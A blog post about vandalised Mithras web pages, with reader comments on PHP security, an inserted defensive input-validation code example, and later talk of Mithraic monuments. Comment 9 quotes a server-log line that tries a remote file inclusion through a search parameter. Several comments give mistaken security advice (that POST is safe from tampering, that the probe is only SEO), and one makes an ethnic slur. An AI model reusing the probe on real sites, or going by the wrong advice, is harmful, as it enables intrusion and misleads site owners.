Vandalism already at the Mithras pages!

I was doing a little work on the scripts, and happened to open an obsolete page on the site.  To my horror I found that it had been vandalised, with crummy HTML for some car insurance.  The vandal had edited it a couple of times, first inserting his muck into a footnote, and then, growing bolder, erasing all the content and pasting in his rubbish.  The IP address responsible was from the United Arab Emirates.

I have it all backed up, so nothing was lost and I have reverted the changes.  What worries me, tho, is how he managed to edit it at all.  Only I have access, as far as I know.  He did edit it through the front-end system, as there are traces in the logs.

It’s a sad change from the last time I made pages available online for online editing.  Back in 2006, people just didn’t do this kind of thing.  Now every two-bit criminal is online.  I shall have to implement some better form of security, and waste useful time on so doing.

How I curse the selfish morons who hire nobodies in places like the UAE to damage the interests of everyone else!

Wonder how the swine found his way in.  It’s not particularly secure, but it shouldn’t be possible for anyone else to edit.

14 Responses to “Vandalism already at the Mithras pages!”


  1. Robert Consoli

    It looks to me like you may be passing parameters in PHP with ‘put’ which means that they show up in the URL line. Hackers can then modify these params to do all sorts of things. You could try researching passing parameters by ‘get’ instead which means that they do not show up on the URL line and can’t be hacked. This is a kind of first line of defense in .php. If this doesn’t apply to you then I apologize.

  2. Robert Consoli

    Sorry for the misinformation. The method to use is $_POST and not $_GET. $_GET is a known security hole. Using method $_GET makes parameters visible on the URL line. Sorry for the first post; I guess I’m rusty. It looks to me like your method display.php uses a parameter called ‘page’. If you’re using $_GET on the other end then you might want to rethink it.

  3. Roger Pearse

    No, you’re quite right. I simply didn’t expect my little site to attract people willing to sit there and mess with the parameters. I added a few extra checks last night, and I’ll have to do some more. Liked yr site, btw … some nice ideas in there.

  4. Anthony

    A particularly apt use of the word ‘swine’, particularly considering the probable ethnic origin of the vandal. I love it :)

  5. Robert Consoli

    Thanks for the comments about my site. With respect to your vandal think of it as a test of the maturity of your code. This happens to everybody all the time; you should see my logs.

    Best,
    Bob

  6. Roger Pearse

    Interesting … what sort of stuff do you get? I ought to look at the http logs (I implemented some logging for the Mithras site, but not with vandalism in mind).

  7. Roger Pearse

    Oink, I say.

  8. Roger Pearse

    Test

  9. Robert Consoli

    Hi Roger,
    Here’s the sort of thing that can happen (although I don’t think that this happened to you) as illustrated by a line from my logs:
    /searchn.php?zoom_query=http://www.la-cloture-electrique.fr/css/made.jpg? Mozilla/3.0 (compatible; Indy Library) 177.xxx.18.182
    This line calls my search engine, searchn.php with the regular parameter ‘zoom_query’. Ordinarily zoom_query would be followed by a search string such as ‘Mithras’ or ‘kylix’. Here it’s followed by another URL: http://www.la-cloture-electrique.fr/css/made(dot)jpg (Don’t click on this.)
    Apparently some targeted sites will try to execute that line and, instead of going where they should, will go somewhere else entirely. I think that this is just to raise their hits for Google ranking and isn’t necessarily nefarious; it’s more like an intentional misunderstanding. As I say, I don’t know that this happened to you. What I do to foil such an attack is to place the originating IP address on my .htaccess list. I don’t even decide this; the software does this automatically. I also examine every character that comes through the URL or the search box. I reject any string that has characters in it which are other than those I specifically allow. This is often enough to stop many malicious attacks. In your case it sounds like you need to change some passwords to be something really difficult.
    Best,
    Bob
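As an added example (not Bob's or Roger's code), here is how the character allow-list Bob describes can be written in PHP for the two parameters mentioned in this thread, `page` on display.php and `zoom_query` on searchn.php. The `pages/` directory, the `.html` suffix and the function names are assumptions for illustration.

```php
<?php
// Added example (not the site's own code): allow-list checks for the two
// parameters mentioned in this thread, display.php?page=... and
// searchn.php?zoom_query=... . The pages/ directory and .html suffix are
// assumptions for illustration.

// A page name may contain only letters, digits, '_' and '-'. That single
// rule excludes '/', '..', '?', '%00' and 'http://' without listing them.
function page_name_is_clean(?string $page): bool
{
    return $page !== null
        && strlen($page) <= 64
        && preg_match('/\A[A-Za-z0-9_-]+\z/', $page) === 1;
}

// Map a clean page name to a file, and refuse anything that resolves
// outside the pages directory (second line of defence behind the regex).
function resolve_page(string $page, string $pagesDir): ?string
{
    if (!page_name_is_clean($page)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.html');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                    // missing, or escaped the directory
    }
    return $path;
}

// A search string may contain letters (any script), digits, spaces and a
// little punctuation. The log line's zoom_query value fails on ':' and '/'.
function search_query_is_clean(?string $q): bool
{
    return $q !== null
        && strlen($q) <= 100
        && preg_match('/\A[\p{L}\p{N} \'.,-]+\z/u', trim($q)) === 1;
}

// Constructed requests modelled on the log line quoted above (the URL is
// a made-up one, not the address from Bob's log).
foreach (['Mithras', 'kylix', 'http://www.example.invalid/css/made.jpg?'] as $q) {
    printf("%-45s %s\n", $q, search_query_is_clean($q) ? 'accepted' : 'rejected');
}
// When a check fails: answer 400, log the remote address for review, and
// (as Bob does) let a script add repeat offenders to .htaccess.
```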

  10. Roger Pearse

    Hi Bob,

    This is really helpful – thank you. I will investigate!

    Roger

  11. Brian Kelly

    Hi, Roger – came across your site recently and find it very interesting (I teach Latin and Classics and am reading more Augustine these days). I assume you know the Radio 4 ‘In Our Time’ programme last week was on Mithraism?

    Thanks again,

    Brian Kelly

  12. Roger Pearse

    Hi Brian,

    Good for you — how do you find the market for Latin teaching these days? Yes, I was tipped off on that programme, and the further reading material on the BBC webpage seemed sound. But I don’t have a spare 45 minutes to listen!

    All the best,

    Roger

  13. Geoffrey Heriot

    Hello Roger:

    I see where you have posted a comment on my picture of Mithras slaying the bull. I gather the CIMRM 593 is the catalogue number of this work? Is that correct?
    Thanks for your interest!

    Geoffrey Heriot

  14. Roger Pearse

    Hi Geoffrey,

    That’s right! The Mithras monuments were all collected in the 50s and published by Maarten Vermaseren in the “Corpus Inscriptionum et Monumentorum Religionis Mithriacae” (collection of inscriptions and monuments of the Mithriac religion), and each assigned a numeral. The scholarly literature always uses this reference.

    Your photo was a nice one of CIMRM 593, which is the earliest tauroctony known (first quarter of the 2nd century A.D.) although the statue has been heavily and badly restored. People may well search for “CIMRM 593”, and if so, I thought it would be good if your picture came up.

    Here are my notes on CIMRM 593.

    More details on Mithraic monuments may be found via my index / gallery here.